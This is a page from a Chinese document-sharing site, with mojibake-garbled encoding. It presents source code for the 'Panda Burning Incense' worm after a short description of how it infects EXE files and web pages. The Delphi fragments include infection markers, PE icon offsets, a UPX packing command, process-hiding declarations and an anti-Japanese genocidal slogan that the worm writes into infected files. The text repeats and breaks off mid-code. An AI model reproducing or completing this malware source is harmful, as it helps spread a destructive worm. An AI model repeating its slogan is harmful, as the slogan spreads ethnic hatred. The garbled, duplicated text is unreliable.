資源描述:
《熊貓燒香病毒源代碼》由會(huì)員上傳分享,免費(fèi)在線閱讀,更多相關(guān)內(nèi)容在行業(yè)資料-天天文庫(kù)。
1、“熊貓燒香”簡(jiǎn)介:“熊貓燒香”病毒是一個(gè)能在電腦操作系統(tǒng)上運(yùn)行的蠕蟲(chóng)病毒。采用“熊貓燒香”頭像作為圖標(biāo)。它的變種會(huì)感染EXE可執(zhí)行文件,被病毒感染的文件圖標(biāo)均變?yōu)椤靶茇垷恪薄M瑫r(shí),受感染的計(jì)算機(jī)還會(huì)出現(xiàn)藍(lán)屏、頻繁重啟以及文件被破壞等現(xiàn)象。該病毒會(huì)在中毒電腦中所有的網(wǎng)頁(yè)文件尾部添加病毒代碼。目前已有百萬(wàn)臺(tái)電腦受害。program?Japussy;usesWindows,?SysUtils,?Classes,?Graphics,?ShellAPI{,?Registry};constHeaderSize?=?82432;?????????????//病毒體的大小IconOff
2、set?=?$12EB8;???????????//PE文件主圖標(biāo)的偏移量//在我的Delphi5?SP1上面編譯得到的大小,其它版本的Delphi可能不同//查找2800000020的十六進(jìn)制字符串可以找到主圖標(biāo)的偏移量??{HeaderSize?=?38912;?????????????//Upx壓縮過(guò)病毒體的大小IconOffset?=?$92BC;?????????????//Upx壓縮過(guò)PE文件主圖標(biāo)的偏移量//Upx?1.24W?用法:?upx?-9?--8086?Japussy.exe}IconSize???=?$2E8;?????????????//PE文
3、件主圖標(biāo)的大小--744字節(jié)IconTail???=?IconOffset?+?IconSize;?//PE文件主圖標(biāo)的尾部ID???????=?$44444444;?????????//感染標(biāo)記//垃圾碼,以備寫(xiě)入Catchword?=?'If?a?race?need?to?be?killed?out,?it?must?be?Yamato.?'?+????????'If?a?country?need?to?be?destroyed,?it?must?be?Japan!?'?+????????'***?W32.Japussy.Worm.A?***';{$R?*.RES}f
4、unction?RegisterServiceProcess(dwProcessID,?dwType:?Integer):?Integer;?stdcall;?external?'Kernel32.dll';?//函數(shù)聲明varTmpFile:?string;Si:?????STARTUPINFO;Pi:?????PROCESS_INFORMATION;IsJap:???Boolean?=?False;?//日文操作系統(tǒng)標(biāo)記{?判斷是否為Win9x?}function?IsWin9x:?Boolean;varVer:?TOSVersionInfo;beginResult?
5、:=?False;Ver.dwOSVersionInfoSize?:=?SizeOf(TOSVersionInfo);if?not?GetVersionEx(Ver)?“熊貓燒香”簡(jiǎn)介:“熊貓燒香”病毒是一個(gè)能在電腦操作系統(tǒng)上運(yùn)行的蠕蟲(chóng)病毒。采用“熊貓燒香”頭像作為圖標(biāo)。它的變種會(huì)感染EXE可執(zhí)行文件,被病毒感染的文件圖標(biāo)均變?yōu)椤靶茇垷恪?。同時(shí),受感染的計(jì)算機(jī)還會(huì)出現(xiàn)藍(lán)屏、頻繁重啟以及文件被破壞等現(xiàn)象。該病毒會(huì)在中毒電腦中所有的網(wǎng)頁(yè)文件尾部添加病毒代碼。目前已有百萬(wàn)臺(tái)電腦受害。program?Japussy;usesWindows,?SysUtils,?Classes,
6、?Graphics,?ShellAPI{,?Registry};constHeaderSize?=?82432;?????????????//病毒體的大小IconOffset?=?$12EB8;???????????//PE文件主圖標(biāo)的偏移量//在我的Delphi5?SP1上面編譯得到的大小,其它版本的Delphi可能不同//查找2800000020的十六進(jìn)制字符串可以找到主圖標(biāo)的偏移量??{HeaderSize?=?38912;?????????????//Upx壓縮過(guò)病毒體的大小IconOffset?=?$92BC;?????????????//Upx壓縮過(guò)PE文件主
7、圖標(biāo)的偏移量//Upx?1.24W?用法:?upx?-9?--8086?Japussy.exe}IconSize???=?$2E8;?????????????//PE文件主圖標(biāo)的大小--744字節(jié)IconTail???=?IconOffset?+?IconSize;?//PE文件主圖標(biāo)的尾部ID???????=?$44444444;?????????//感染標(biāo)記//垃圾碼,以備寫(xiě)入Catchword?=?'If?a?race?need?to?be?killed?out,?it?must?be?Yamato.?'?+??????